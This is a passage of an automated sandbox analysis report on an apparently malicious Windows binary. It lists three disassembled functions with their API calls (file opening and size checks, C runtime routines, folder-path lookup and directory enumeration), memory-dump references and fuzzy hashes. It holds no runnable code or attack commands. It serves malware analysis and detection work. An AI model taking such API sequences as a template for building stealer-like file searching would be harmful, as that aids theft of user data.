                  Function 00D492E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00D43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00D43AEE,?), ref: 00D492FC
                  • GetFileSizeEx.KERNEL32(000000FF,00D43AEE), ref: 00D49319
                  • CloseHandle.KERNEL32(000000FF), ref: 00D49327
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                  • Instruction ID: ae9a10ebb245fde290d2ef09c79049fe71e8557ca2d78d5ae76a12bad3d8acf8
                  • Opcode Fuzzy Hash: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                  • Instruction Fuzzy Hash: C3F0A934E00208BBDB14DFB1DC19F9EB7B9AB88320F11C254BA55A72C0D670AA419B51
                  Function 00D4C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 00D4C74E
                    • Part of subcall function 00D4BF9F: __amsg_exit.LIBCMT ref: 00D4BFAF
                  • __getptd.LIBCMT ref: 00D4C765
                  • __amsg_exit.LIBCMT ref: 00D4C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00D4C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                  • Instruction ID: 29935a6414632201ced1ed2a2306b2e1e77edaa955fd15cc666faa069bb0ad2e
                  • Opcode Fuzzy Hash: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                  • Instruction Fuzzy Hash: 51F0B4329527109BDB70BBBC5807B5D33A0EF10732F24514AF844A62D2DB6499449E76
                  Function 00D44F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44F7A
                  • lstrcat.KERNEL32(?,00D51070), ref: 00D44F97
                  • lstrcat.KERNEL32(?,00AF9108), ref: 00D44FAB
                  • lstrcat.KERNEL32(?,00D51074), ref: 00D44FBD
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                    • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                    • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                    • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                  • Instruction ID: 7abd70461d1d544a86826db372bc2bc92e33cb0c372b89da0884d4f52500f952
                  • Opcode Fuzzy Hash: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                  • Instruction Fuzzy Hash: 0421867A9402086BCB54FBB0DC46EED333CEB98301F004558BA5992181EE749ACC9BB3